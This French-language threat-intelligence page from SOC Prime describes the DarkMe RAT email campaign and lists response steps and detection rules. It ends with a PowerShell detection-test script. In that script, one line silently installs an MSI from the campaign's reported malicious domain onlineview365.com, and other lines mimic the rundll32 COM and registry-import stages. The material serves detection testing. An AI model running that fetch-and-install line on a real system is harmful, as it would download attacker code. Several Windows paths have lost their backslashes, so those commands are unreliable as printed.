SOC Prime Bias: High

25 Sep 2026 08:20 UTC

La campagne d’e-mails DarkMe élargit sa cible dans les attaques APT avec RAT

Author Photo
SOC Prime Team linkedin icon Suivre
La campagne d’e-mails DarkMe élargit sa cible dans les attaques APT avec RAT
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Résumé

Une nouvelle campagne livrant le spyware RAT DarkMe a été observée en s’appuyant sur l’ingénierie sociale plutôt que sur les failles logicielles. Les attaquants distribuent un .pif fichier par email, qui initie une chaîne d’infection multi-étapes impliquant MSIEXEC et plusieurs chargeurs basés sur VB6. Le passage de l’exploitation de zero-day à l’ingénierie sociale à grande échelle suggère un glissement vers des méthodes d’attaque moins coûteuses, plus larges et moins sélectives.

Investigation

Huntress a identifié la campagne après avoir détecté un .pif fichier déclenchant Windows Installer pour récupérer un package MSI distant. L’analyse a découvert une chaîne complexe en plusieurs étapes impliquant un script de mise en scène nommé prnfig.wsf, des importations de registre, et l’exécution d’un objet COM via rundll32.exe /sta. L’étape finale utilise le creusement de processus pour injecter la charge utile DarkMe dans le binaire signé Microsoft clspack.exe.

Réduction

Les défenseurs devraient surveiller rundll32.exe lancé avec le /sta drapeau et un GUID sans chemin de DLL accompagnant. Les équipes de sécurité devraient également détecter msiexec récupérant des packages MSI distants sur HTTPS et enquêter sur l’exécution de .pif fichiers. Les binaires Microsoft signés exécutés depuis des emplacements inhabituels tels que %AppData% devraient faire l’objet d’une surveillance supplémentaire.

Réponse

Lorsqu’une activité suspecte est détectée, isolez immédiatement le point de terminaison affecté pour interrompre la communication C2 et empêcher l’exfiltration des données. Terminez le processus creusé et supprimez les artefacts malveillants de clspack.exe process and remove malicious artifacts from %AppData%ComponentsFolder and %AppData%Microsoft. Supprimez la persistance créée via le gestionnaire de protocole URL personnalisé et la clé HKCU Run . Réinitialisez les identifiants utilisateur affectés et considérez tout portefeuille de cryptomonnaie stocké localement comme potentiellement compromis.

Flux d’Attaque

Nous mettons encore à jour cette partie.

Détections

Points de Persistance Possibles [ASEPs – Registre Software/NTUSER] (via événement de registre)

Équipe SOC Prime
24 Sep 2026

Extension Inhabituelle du Binaire Exécutable (via création de processus)

Équipe SOC Prime
24 Sep 2026

LOLBAS WScript / CScript (via création de processus)

Équipe SOC Prime
24 Sep 2026

Tentative d’Installation de Fichier MSI Distant Possible (via ligne de commande)

Équipe SOC Prime
24 Sep 2026

Commande et Contrôle Suspicieux par Requête DNS de Domaine de Premier Niveau (TLD) Inhabituelle (via dns)

Équipe SOC Prime
24 Sep 2026

IOC (HashSha256) pour détecter : la Campagne d’Email DarkMe Élargit le Ciblage pour le RAT APT

Règles AI SOC Prime
24 Sep 2026

IOC (SourceIP) pour détecter : la Campagne d’Email DarkMe Élargit le Ciblage pour le RAT APT

Règles AI SOC Prime
24 Sep 2026

IOC (DestinationIP) pour détecter : la Campagne d’Email DarkMe Élargit le Ciblage pour le RAT APT

Règles AI SOC Prime
24 Sep 2026

Détection de Communication C2 et Domaine de Staging pour le RAT DarkMe [Connexion Réseau Windows]

Règles AI SOC Prime
24 Sep 2026

Détection des Activités de Campagne Malveillante de RAT DarkMe [Création de Processus Windows]

Règles AI SOC Prime
24 Sep 2026

Exécution de Simulation

  • Narratif de l’Attaque & Commandes: L’adversaire vise à déployer le RAT DarkMe pour maintenir la persistance. Pour échapper à la détection basée sur les signatures, l’attaquant utilise msiexec pour récupérer une charge utile distante depuis un domaine compromis (onlineview365.com). Suite à l’infection initiale, l’attaquant utilise rundll32.exe pour invoquer un objet COM spécifique via un GUID pour exécuter le code en mémoire, et ensuite utilise cmd.exe pour importer des configurations de registre à partir d’un fichier texte pour préparer l’environnement pour une exécution de charge utile basée sur wscript.exe .

  • Script de Test de Régression :

    # Script de Simulation de DarkMe RAT
    # Ce script simule les lignes de commande exactes définies dans la règle Sigma.
    
    Write-Host "[+] Démarrage de la Simulation du RAT DarkMe..." -ForegroundColor Cyan
    
    # 1. Simuler le téléchargement distant de msiexec
    Write-Host "[*] Simulation du téléchargement distant de msiexec..."
    Start-Process msiexec.exe -ArgumentList "/i https://onlineview365.com/propi.msi /quiet /norestart" -ErrorAction SilentlyContinue
    
    # 2. Simuler l'exécution de l'objet COM avec rundll32
    Write-Host "[*] Simulation de l'exécution de rundll32 COM..."
    Start-Process rundll32.exe -ArgumentList "/sta {CFDC57BA-1705-45AF-BA10-EFC3D592982B}" -ErrorAction SilentlyContinue
    
    # 3. Simuler l'importation de registre avec cmd.exe
    Write-Host "[*] Simulation de l'importation de registre avec cmd.exe..."
    $tempFile = "$env:TEMPfiletext2.txt"
    "Windows Registry Editor Version 5.00`n[HKEY_CURRENT_USERSoftwareDarkMe]`n"Test"="Value"" | Out-File -FilePath $tempFile -Encoding ascii
    Start-Process cmd.exe -ArgumentList "/c reg.exe import ""$tempFile""" -Wait
    
    # 4. Simuler l'exécution de wscript.exe via la chaîne parent/rundll32
    Write-Host "[*] Simulation de l'exécution de wscript.exe depuis AppData..."
    $scriptPath = "$env:APPDATAmalicious_script.vbs"
    "WScript.Echo `"DarkMe Simulée`"" | Out-File -FilePath $scriptPath -Encoding ascii
    
    # Pour déclencher la règle parent/enfant spécifique :
    # Parent : C:WindowsSysWOW64rundll32.exe /sta {CFDC57BA-1705-45AF-BA10-EFC3D592982B}
    # Enfant : wscript.exe %AppData%malicious_script.vbs
    Start-Process cmd.exe -ArgumentList "/c C:WindowsSysWOW64rundll32.exe /sta {CFDC57BA-1705-45AF-BA10-EFC3D592982B} & wscript.exe ""$scriptPath""" -Wait
    
    Write-Host "[+] Simulation Terminée." -ForegroundColor Green
  • Commandes de Nettoyage :

    # Nettoyer les Artéfacts de Simulation
    Write-Host "[+] Nettoyage..." -ForegroundColor Yellow
    Remove-Item -Path "$env:TEMPfiletext2.txt" -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:APPDATAmalicious_script.vbs" -ErrorAction SilentlyContinue
    Write-Host "[+] Nettoyage Terminé." -ForegroundColor Green